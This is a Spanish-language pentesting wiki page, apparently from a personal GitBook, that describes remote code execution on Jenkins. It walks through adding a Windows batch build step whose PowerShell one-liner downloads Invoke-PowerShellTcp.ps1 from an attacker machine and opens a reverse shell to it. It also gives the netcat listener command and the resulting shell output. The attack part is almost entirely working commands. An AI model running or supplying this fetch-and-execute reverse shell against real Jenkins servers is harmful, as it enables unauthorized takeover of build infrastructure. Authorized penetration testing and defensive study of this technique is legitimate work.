Grimorio de XTORMIN
Xtormin GithubLinkedIn
  • Home
  • 🧠IA / AI
    • Investigación y automatización
    • IA en local
    • Plantillas de prompts
      • Informes de pentesting
  • 🏢Pentesting en Infraestructuras
    • Intrusión física
    • Redes Wi-Fi
      • Herramientas
      • Metodología de Pentest Wifi
      • WEP
      • WPA2-PSK / Red personal
      • WPA2-MGT / Red corporativa
    • Cloud
      • 🔷Azure
        • Herramientas
        • Metodología de Azure Pentest
        • AzureAD
        • Az Powershell
        • Az Cli
        • Portal de Azure
    • Perímetro
      • Acceso remoto
    • Red interna
      • Windows
      • Active directory
        • Enumeración manual
    • Servicios
      • FTP - 21/tcp
      • SSH - 22/tcp
      • DNS - 53/UDP
      • SMB - 135, 445 /tcp
      • SNMP - 161, 162, 10161, 10162/udp
      • IPMI - 623/udp/tcp
      • RDP - 3389/TCP
      • Redis - 6379/tcp
    • Misc
      • Transferencia de ficheros
  • 🌐Pentesting en aplicaciones web
    • General
      • Ataques y vulnerabilidades
        • Autenticación
          • Vulnerabilidades JWT
        • Javascript
          • XSS
          • Contaminación de prototipos - Prototype pollution
        • GraphQL
      • Explotación
        • Webshell
    • Tecnología
      • Jenkins
      • Salesforce
  • ⚒️Herramientas comunes
    • Recursos generales
    • Nmap
    • Nuclei
    • BloodHound
  • 👾MISC
    • [ Kali ] Setup
      • VPN
Con tecnología de GitBook
En esta página
  • Explotación
  • [RCE] Ejecución de comandos + Reverse shell

¿Te fue útil?

  1. Pentesting en aplicaciones web
  2. Tecnología

Jenkins

AnteriorTecnologíaSiguienteSalesforce

Última actualización hace 1 mes

¿Te fue útil?

Explotación

[RCE] Ejecución de comandos + Reverse shell

Creación de una tarea dentro de un proyecto con un código que envíe una reverse shell hacia una máquina controlada por el/la atacante que se encuentre a la escucha:

Dashboard > Project 1 > Configure > Build Triggers > Build Steps > Execute Windows batch command

192.168.1.100 # IP de la máquina de ataque 
443           # Puerto a la escucha en la máquina
powershell iex(iwr -UseBasicParsing http://192.168.1.100/Invoke-PowerShellTcp.ps1); power -Reverse -IPAddress 192.168.1.100 -Port 443

En la máquina de ataque se pone el puerto 443 a la escucha:

C:\Infra\Tools\netcat\nc64.exe -lvp 443

Por otro lado, en la máquina de ataque, se levanta un servidor temporal donde se expondrá el fichero "Invoke-PowerShellTcp.ps1" que se utiliza en el payload anterior.

Después de levantar el servidor temporal y poner el puerto 443 a la escucha, se ejecuta la tarea de Jenkins:

Cuando finalice la ejecución de la tarea, se obtendrá la consola de powershell:

listening on [any] 443 ...
192.168.1.112: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.112] 50238: NO_DATA
Windows PowerShell running as user webuser on JKSERVER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\.jenkins\workspace\Project1>

🌐
Misc